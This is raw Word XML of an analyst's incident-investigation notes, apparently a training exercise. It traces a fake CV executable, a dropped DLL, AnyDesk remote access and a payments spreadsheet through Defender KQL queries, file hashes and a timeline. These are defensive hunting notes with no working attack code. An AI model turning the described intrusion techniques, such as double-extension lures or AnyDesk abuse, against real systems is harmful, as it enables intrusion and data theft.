    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="642FB5A0" w14:textId="561140C1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SHA256,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="0F4966BA" w14:textId="6957F850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InitiatingProcessFileName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="6D4A7A8B" w14:textId="227CCE8D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InitiatingProcessId, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="6A1BEC96" w14:textId="5ED51F71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ReportId, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="14BCF520" w14:textId="706293CA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          AdditionalFields </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="71D8853E" w14:textId="28F2275E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>| order by Timestamp asc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="78194320" w14:textId="3FBF900D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 xml:space="preserve">We see the </w:t>
      </w:r>
      <w:r w:rsidR="0BEDA88D">
        <w:rPr/>
        <w:t>"AnyDesk.exe”</w:t>
      </w:r>
      <w:r w:rsidR="047FA63F">
        <w:rPr/>
        <w:t xml:space="preserve"> on devices “as-pc2” and “as-</w:t>
      </w:r>
      <w:r w:rsidR="047FA63F">
        <w:rPr/>
        <w:t>srv</w:t>
      </w:r>
      <w:r w:rsidR="507B3C3F">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="047FA63F">
        <w:rPr/>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="507B3C3F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="507B3C3F">
        <w:rPr/>
        <w:t>AnyDesk</w:t>
      </w:r>
      <w:r w:rsidR="507B3C3F">
        <w:rPr/>
        <w:t xml:space="preserve"> is commonly used for persistence, interactive </w:t>
      </w:r>
      <w:r w:rsidR="507B3C3F">
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="507B3C3F">
        <w:rPr/>
        <w:t xml:space="preserve"> and control (C2), and to ex</w:t>
      </w:r>
      <w:r w:rsidR="5408CDBE">
        <w:rPr/>
        <w:t>filtrate data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="3BBB38C8" w14:textId="6F484516">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="047FA63F">
        <w:rPr/>
        <w:t>SHA256 – f42b635d93720d1624c74121b83794d706d4d064bee027650698025703d20532</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="6A3BE160" w14:textId="4701C173">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="047FA63F">
        <w:drawing>
          <wp:inline wp14:editId="3DBB5546" wp14:anchorId="328B675C">
            <wp:extent cx="5943600" cy="628650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15915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5350" name="Picture 15915350"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId473934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554B0" w:rsidP="65FB3171" w:rsidRDefault="03C554B0" w14:paraId="2169BD9E" w14:textId="0118E7D5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="03C554B0">
        <w:rPr/>
        <w:t>To do tomorrow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AF42F45" w:rsidP="65FB3171" w:rsidRDefault="3AF42F45" w14:paraId="6DB06E13" w14:textId="7A334913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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3AF42F45">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial access – How did </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3AF42F45">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3AF42F45">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> get there?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5CD5A8" w:rsidP="65FB3171" w:rsidRDefault="5B5CD5A8" w14:paraId="40220086" w14:textId="198FBAA8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B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>KQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5CD5A8" w:rsidP="65FB3171" w:rsidRDefault="5B5CD5A8" w14:paraId="266B139B" w14:textId="5E0E47E0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B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>DeviceNetworkEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5CD5A8" w:rsidP="65FB3171" w:rsidRDefault="5B5CD5A8" w14:paraId="220AFE1B" w14:textId="66B12663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B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| where </w:t>
      </w:r>
      <w:r w:rsidR="5B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>DeviceName</w:t>
      </w:r>
      <w:r w:rsidR="5B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> =~ "as-pc1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5CD5A8" w:rsidP="65FB3171" w:rsidRDefault="5B5CD5A8" w14:paraId="7B437139" w14:textId="5B97BF03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B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| where </w:t>
      </w:r>
      <w:r w:rsidR="5B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>InitiatingProcessAccountName</w:t>
      </w:r>
      <w:r w:rsidR="5B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> =~ "</w:t>
      </w:r>
      <w:r w:rsidR="5B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sophie.turner</w:t>
      </w:r>
      <w:r w:rsidR="5B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5CD5A8" w:rsidP="65FB3171" w:rsidRDefault="5B5CD5A8" w14:paraId="293F9947" w14:textId="01362FDF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B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|where </w:t>
      </w:r>
      <w:r w:rsidR="5B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>InitiatingProcessFileName</w:t>
      </w:r>
      <w:r w:rsidR="5B5CD5A8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> =~ "daniel_richardson_cv.pdf.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="58AB6804" w:rsidP="65FB3171" w:rsidRDefault="58AB6804" w14:paraId="3955C02D" w14:textId="3218A4E9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="58AB6804">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2026-01-15T03:47:10.786699Z - </w:t>
      </w:r>
      <w:r w:rsidR="3999931C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A network search was done to find the first instance with an initiating process file name from “daniel_richardson_cv.pdf.exe.” The file hash is: 48b97fd91946e81e3e7742b3554585360551551cbf9398e1f34f4bc4eac3a6b5</w:t>
      </w:r>
      <w:r w:rsidR="4D978B66">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which matches what we found from the payload. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F942141" w:rsidP="65FB3171" w:rsidRDefault="0F942141" w14:paraId="6BE879E9" w14:textId="05E4F112">
      <w:pPr>
        <w:pStyle w:val="Normal"/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F942141">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2026-01-15T03:46:55.1674483Z - Right before the network activity, I see that 3gfdjnio.dll was created to “C:\Users\</w:t>
      </w:r>
      <w:r w:rsidR="0F942141">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Sophie.Turner</w:t>
      </w:r>
      <w:r w:rsidR="0F942141">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="0F942141">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:r w:rsidR="0F942141">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>\Local\Temp\3gfdjnio\3gfdjnio.dll</w:t>
      </w:r>
      <w:r w:rsidR="14B09E15">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0F942141">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="792217F3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Oddly, there </w:t>
      </w:r>
      <w:r w:rsidR="792217F3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>isn’t</w:t>
      </w:r>
      <w:r w:rsidR="792217F3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> any 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>InitiatingProcessAccountDomain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>InitiatingProcessFileName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>InitiatingProcessCommandLine</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="792217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2217F3" w:rsidP="65FB3171" w:rsidRDefault="792217F3" w14:paraId="37113BB2" w14:textId="75265575">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="792217F3">
        <w:drawing>
          <wp:inline wp14:editId="5219ADEA" wp14:anchorId="73D0D3E2">
            <wp:extent cx="5943600" cy="333375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="974182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182057" name="Picture 974182057"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId679712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B2D24" w:rsidP="65FB3171" w:rsidRDefault="5FEB2D24" w14:paraId="4ECC0187" w14:textId="1FD46EBC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="5FEB2D24">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T03:46:55.1155251Z - </w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t xml:space="preserve">cvtres.exe ran which was </w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>initiated</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t xml:space="preserve"> by csc.exe. The command processed was “cvtres.exe /NOLOGO /READONLY /</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>MACHINE:IX</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>86 "/</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>OUT:C:\Users\SOPHIE</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>~1.TUR\</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>AppData</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>\Local\Temp\RES8F5D.tmp" "c:\Users\</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>Sophie.Turner</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>AppData</w:t>
      </w:r>
      <w:r w:rsidR="607BFC71">
        <w:rPr/>
        <w:t>\Local\Temp\3gfdjnio\CSC98B80DAD67B24F36BB44EC3D0E18EB8.TMP"”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="66842090" w:rsidP="65FB3171" w:rsidRDefault="66842090" w14:paraId="62D04189" w14:textId="619D2BEE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="66842090">
        <w:drawing>
          <wp:inline wp14:editId="0D18F5C6" wp14:anchorId="541501B5">
            <wp:extent cx="5943600" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1940882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882642" name="Picture 1940882642"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId754001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B3171" w:rsidP="65FB3171" w:rsidRDefault="65FB3171" w14:paraId="70DE1D4E" w14:textId="4D95710F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="174C046D" w:rsidP="65FB3171" w:rsidRDefault="174C046D" w14:paraId="2390BD7C" w14:textId="67E1F8DA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="24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</w:pPr>
      <w:r w:rsidR="174C046D">
        <w:rPr/>
        <w:t xml:space="preserve">FIND HOME FOR - </w:t>
      </w:r>
      <w:r w:rsidR="3AF42F45">
        <w:rPr/>
        <w:t xml:space="preserve">Prove </w:t>
      </w:r>
      <w:r w:rsidR="3AF42F45">
        <w:rPr/>
        <w:t xml:space="preserve">artifact </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3AF42F4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.</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3AF42F4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~lock.BACS_Payments_Dec2025.ods#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 - DONE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="097DA854" w:rsidP="65FB3171" w:rsidRDefault="097DA854" w14:paraId="6752A3A1" w14:textId="4AA0531F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="24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KQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="097DA854" w:rsidP="65FB3171" w:rsidRDefault="097DA854" w14:paraId="7AECDCC2" w14:textId="71F60C07">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="24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DeviceFileEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="097DA854" w:rsidP="65FB3171" w:rsidRDefault="097DA854" w14:paraId="104735D8" w14:textId="077F6C7A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/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| where FileName contains "BACS_Payments_Dec2025"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="097DA854" w:rsidP="65FB3171" w:rsidRDefault="097DA854" w14:paraId="0E07C11E" w14:textId="335960B8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/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| project Timestamp, FileName, ActionType, FolderPath, InitiatingProcessFileName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="097DA854" w:rsidP="65FB3171" w:rsidRDefault="097DA854" w14:paraId="28857259" w14:textId="47A1B619">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/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| order by Timestamp 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asc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="097DA854" w:rsidP="65FB3171" w:rsidRDefault="097DA854" w14:paraId="6ECAA460" w14:textId="5E1CAA2E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off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</w:pP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2026-01-15T04:44:06.0147429Z - The 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“.~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lock.BACS_Payments_Dec2025.ods#” temporary file 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indicates</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="097DA85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 the file was opened for editing instead of viewing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02D299BE" w:rsidP="65FB3171" w:rsidRDefault="02D299BE" w14:paraId="3CAE3F49" w14:textId="5F8B421A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="02D299BE">
        <w:drawing>
          <wp:inline wp14:editId="113A427B" wp14:anchorId="04DD9A95">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="855083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083725" name="Picture 855083725"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId72626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1399D"/>
    <w:rsid w:val="0042C4C1"/>
    <w:rsid w:val="00A782A6"/>
    <w:rsid w:val="00D84F7F"/>
    <w:rsid w:val="010A22F0"/>
    <w:rsid w:val="0238398A"/>
    <w:rsid w:val="02D299BE"/>
    <w:rsid w:val="02DFFCB7"/>
    <w:rsid w:val="037939D9"/>
    <w:rsid w:val="038847C5"/>
    <w:rsid w:val="03C554B0"/>
    <w:rsid w:val="047FA63F"/>
    <w:rsid w:val="05A28843"/>
    <w:rsid w:val="060B8D5B"/>
    <w:rsid w:val="06B26AB6"/>
    <w:rsid w:val="070D49DE"/>
    <w:rsid w:val="090FFFFF"/>
    <w:rsid w:val="097DA854"/>
    <w:rsid w:val="09A7EA22"/>
    <w:rsid w:val="09E6FF3C"/>
    <w:rsid w:val="0A74BCF2"/>
    <w:rsid w:val="0A7FEB86"/>
    <w:rsid w:val="0AC3DF96"/>
    <w:rsid w:val="0B0FE73B"/>
    <w:rsid w:val="0B17DA40"/>
    <w:rsid w:val="0BDC3ED6"/>
    <w:rsid w:val="0BEDA88D"/>
    <w:rsid w:val="0C6F2532"/>
    <w:rsid w:val="0CA491B5"/>
    <w:rsid w:val="0D2FD789"/>
    <w:rsid w:val="0D7516FA"/>
    <w:rsid w:val="0DF30827"/>
    <w:rsid w:val="0DFF6273"/>
    <w:rsid w:val="0F35B7D8"/>
    <w:rsid w:val="0F59DDF8"/>
    <w:rsid w:val="0F942141"/>
    <w:rsid w:val="0FE4A98C"/>
    <w:rsid w:val="0FFF735A"/>
    <w:rsid w:val="10630A78"/>
    <w:rsid w:val="107331A7"/>
    <w:rsid w:val="10A5B952"/>
    <w:rsid w:val="113DCD1B"/>
    <w:rsid w:val="114C3644"/>
    <w:rsid w:val="119C935D"/>
    <w:rsid w:val="124E6805"/>
    <w:rsid w:val="125A39C6"/>
    <w:rsid w:val="129ECE79"/>
    <w:rsid w:val="130EDC5F"/>
    <w:rsid w:val="13554D00"/>
    <w:rsid w:val="140BB790"/>
    <w:rsid w:val="144F38C1"/>
    <w:rsid w:val="14B09E15"/>
    <w:rsid w:val="15BDD734"/>
    <w:rsid w:val="162D1A35"/>
    <w:rsid w:val="165BC514"/>
    <w:rsid w:val="1698A16F"/>
    <w:rsid w:val="1717B461"/>
    <w:rsid w:val="171DD181"/>
    <w:rsid w:val="174C046D"/>
    <w:rsid w:val="17E050A5"/>
    <w:rsid w:val="198A3531"/>
    <w:rsid w:val="1ACFBECA"/>
    <w:rsid w:val="1B3FA348"/>
    <w:rsid w:val="1BE9B642"/>
    <w:rsid w:val="1C1981F9"/>
    <w:rsid w:val="1C25BC84"/>
    <w:rsid w:val="1CDF17A6"/>
    <w:rsid w:val="1D299FFF"/>
    <w:rsid w:val="1D31399D"/>
    <w:rsid w:val="1DBE53BB"/>
    <w:rsid w:val="1DE65BA0"/>
    <w:rsid w:val="1E34DD9A"/>
    <w:rsid w:val="1E502FF3"/>
    <w:rsid w:val="1EBD43B6"/>
    <w:rsid w:val="1F02D601"/>
    <w:rsid w:val="1F71E3E0"/>
    <w:rsid w:val="205853EB"/>
    <w:rsid w:val="20F8FC87"/>
    <w:rsid w:val="21C04745"/>
    <w:rsid w:val="21D8ECF6"/>
    <w:rsid w:val="22518BEF"/>
    <w:rsid w:val="22D7A884"/>
    <w:rsid w:val="231E9C76"/>
    <w:rsid w:val="237EA1F6"/>
    <w:rsid w:val="23EAFD61"/>
    <w:rsid w:val="249DE3F6"/>
    <w:rsid w:val="24B7C2DA"/>
    <w:rsid w:val="255264B3"/>
    <w:rsid w:val="26BBD66D"/>
    <w:rsid w:val="28065677"/>
    <w:rsid w:val="28186A95"/>
    <w:rsid w:val="289D13F0"/>
    <w:rsid w:val="28AE8489"/>
    <w:rsid w:val="29412CFB"/>
    <w:rsid w:val="295A5B9F"/>
    <w:rsid w:val="29792D4A"/>
    <w:rsid w:val="2992870D"/>
    <w:rsid w:val="2AB2BBBB"/>
    <w:rsid w:val="2AF54C18"/>
    <w:rsid w:val="2C5188F8"/>
    <w:rsid w:val="2C7DC8E6"/>
    <w:rsid w:val="2CA2A2E0"/>
    <w:rsid w:val="2CD6016B"/>
    <w:rsid w:val="2D4B3DC7"/>
    <w:rsid w:val="2DA63F8C"/>
    <w:rsid w:val="2DDA9621"/>
    <w:rsid w:val="2E004344"/>
    <w:rsid w:val="2EB280C2"/>
    <w:rsid w:val="2FE28E94"/>
    <w:rsid w:val="305E3549"/>
    <w:rsid w:val="31539B3F"/>
    <w:rsid w:val="31FDABB8"/>
    <w:rsid w:val="335F3031"/>
    <w:rsid w:val="3388D794"/>
    <w:rsid w:val="33B38951"/>
    <w:rsid w:val="34851251"/>
    <w:rsid w:val="34EAF35E"/>
    <w:rsid w:val="3754E032"/>
    <w:rsid w:val="3798A1AF"/>
    <w:rsid w:val="391830A3"/>
    <w:rsid w:val="3999931C"/>
    <w:rsid w:val="3A977319"/>
    <w:rsid w:val="3AF42F45"/>
    <w:rsid w:val="3B3850C6"/>
    <w:rsid w:val="3C23B12E"/>
    <w:rsid w:val="3D116C1B"/>
    <w:rsid w:val="3DDCB290"/>
    <w:rsid w:val="3DFD508B"/>
    <w:rsid w:val="3F45C6D9"/>
    <w:rsid w:val="3F4EEE0D"/>
    <w:rsid w:val="3F6E8EC2"/>
    <w:rsid w:val="3F7021DC"/>
    <w:rsid w:val="4074F958"/>
    <w:rsid w:val="40834189"/>
    <w:rsid w:val="40984134"/>
    <w:rsid w:val="40B6CB9F"/>
    <w:rsid w:val="4273CD7C"/>
    <w:rsid w:val="42B4BA37"/>
    <w:rsid w:val="44C0584D"/>
    <w:rsid w:val="451E16A9"/>
    <w:rsid w:val="45F2DF01"/>
    <w:rsid w:val="465CD938"/>
    <w:rsid w:val="46E1E7E1"/>
    <w:rsid w:val="474F702C"/>
    <w:rsid w:val="481C04C6"/>
    <w:rsid w:val="4948CD48"/>
    <w:rsid w:val="495F1D87"/>
    <w:rsid w:val="49C60A7B"/>
    <w:rsid w:val="49E019C1"/>
    <w:rsid w:val="49EEDDD3"/>
    <w:rsid w:val="4A2B2BF4"/>
    <w:rsid w:val="4A31C9A5"/>
    <w:rsid w:val="4A49C866"/>
    <w:rsid w:val="4A967BEA"/>
    <w:rsid w:val="4BC54C03"/>
    <w:rsid w:val="4D978B66"/>
    <w:rsid w:val="4E1537E5"/>
    <w:rsid w:val="4E164B04"/>
    <w:rsid w:val="4F4A410A"/>
    <w:rsid w:val="4FB503EB"/>
    <w:rsid w:val="4FF033B0"/>
    <w:rsid w:val="507B3C3F"/>
    <w:rsid w:val="50D55F48"/>
    <w:rsid w:val="50FC5AB0"/>
    <w:rsid w:val="5158151A"/>
    <w:rsid w:val="522856BF"/>
    <w:rsid w:val="5374D736"/>
    <w:rsid w:val="53758C2D"/>
    <w:rsid w:val="5408CDBE"/>
    <w:rsid w:val="545EF03E"/>
    <w:rsid w:val="54983465"/>
    <w:rsid w:val="5616E583"/>
    <w:rsid w:val="570184C2"/>
    <w:rsid w:val="570A5305"/>
    <w:rsid w:val="570E25C6"/>
    <w:rsid w:val="572166C2"/>
    <w:rsid w:val="57511115"/>
    <w:rsid w:val="57712FDD"/>
    <w:rsid w:val="57BC9EB6"/>
    <w:rsid w:val="57D06607"/>
    <w:rsid w:val="57D66FA9"/>
    <w:rsid w:val="57F0E7FE"/>
    <w:rsid w:val="58AB6804"/>
    <w:rsid w:val="591F4246"/>
    <w:rsid w:val="5A572CC1"/>
    <w:rsid w:val="5A8B049A"/>
    <w:rsid w:val="5AF8CC0D"/>
    <w:rsid w:val="5B5CD5A8"/>
    <w:rsid w:val="5C312B24"/>
    <w:rsid w:val="5D27A08C"/>
    <w:rsid w:val="5D77DA1D"/>
    <w:rsid w:val="5FDFC46F"/>
    <w:rsid w:val="5FEB2D24"/>
    <w:rsid w:val="607BFC71"/>
    <w:rsid w:val="61D5398F"/>
    <w:rsid w:val="625E5A1F"/>
    <w:rsid w:val="62D778F0"/>
    <w:rsid w:val="62F44EEF"/>
    <w:rsid w:val="6408D24C"/>
    <w:rsid w:val="6519093D"/>
    <w:rsid w:val="65C56CBF"/>
    <w:rsid w:val="65FB3171"/>
    <w:rsid w:val="660CCE74"/>
    <w:rsid w:val="66842090"/>
    <w:rsid w:val="66897FC4"/>
    <w:rsid w:val="66FCD6E6"/>
    <w:rsid w:val="671E0F34"/>
    <w:rsid w:val="682695AB"/>
    <w:rsid w:val="684CD3DB"/>
    <w:rsid w:val="68B2B66A"/>
    <w:rsid w:val="68BB669C"/>
    <w:rsid w:val="68D574CA"/>
    <w:rsid w:val="68E3A8BA"/>
    <w:rsid w:val="69613987"/>
    <w:rsid w:val="69DF0333"/>
    <w:rsid w:val="6A4115C9"/>
    <w:rsid w:val="6A54687B"/>
    <w:rsid w:val="6A70621F"/>
    <w:rsid w:val="6AEC1E81"/>
    <w:rsid w:val="6B7CE6BD"/>
    <w:rsid w:val="6B901ECE"/>
    <w:rsid w:val="6BBA2D7A"/>
    <w:rsid w:val="6C84A6AC"/>
    <w:rsid w:val="6CB2A0D2"/>
    <w:rsid w:val="6D6EA558"/>
